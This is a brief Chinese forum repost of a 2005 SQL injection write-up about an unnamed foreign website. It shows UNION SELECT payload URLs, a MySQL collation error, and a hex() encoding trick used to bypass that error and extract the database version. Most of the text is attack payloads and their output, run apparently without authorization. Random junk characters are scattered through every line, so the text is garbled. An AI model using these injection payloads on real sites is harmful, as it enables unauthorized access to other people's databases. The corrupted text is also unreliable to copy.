本文作者:SuperHei$ Z- y( S- L$ p" j
文章性质:原创+ R8 }; x; g' i6 E
发布日期:2005-10-18: g4 T7 |* u6 [- b* ^5 c3 D; c
测试个国外的站时:1 |- L* H! }! E
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
' `7 o9 q! E3 b7 x8 |返回错误:& t1 r7 y; o. G% j" N6 O R
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'/ b5 M! d3 B: C
MySQL Error No. 126
/ R( z4 r' y+ R' x* p5 z看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
0 P! n; c! D. R$ p" M, `, i% i解决办法:转为其他编码如hex。
8 k7 _$ ]* K* ?1 _! v. o2 l; aurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
' ^* w2 n& I7 \ O1 j# c成功得到hex(version())的值为:8 u. O6 ~# e5 @. \
342E312E332D62657461
2 R, x1 q* L1 u& X+ j回Mysql查询下得到:
' i2 d/ [0 z2 umysql> select 0x342E312E332D62657461;# a3 @( K) C+ y( j( \8 q
+------------------------+
+ @5 n+ ]! V, E# S6 |9 m/ k+ R| 0x342E312E332D62657461 |
0 { W9 z0 L' Q% Z9 G& U$ _6 D- Z+------------------------+& ~4 U. t( `! X
| 4.1.3-beta |/ U" k' T* H6 o% }. f$ B
+------------------------+
# t/ H0 b$ F+ Q, v5 a7 T1 row in set (0.00 sec) ]9 a$ [5 O, z6 y1 M. @, A
6 e7 r+ t5 f0 f4 X. t4 q2 u @
|
发表于 2012-9-15 14:04:54
收藏
分享
支持
反对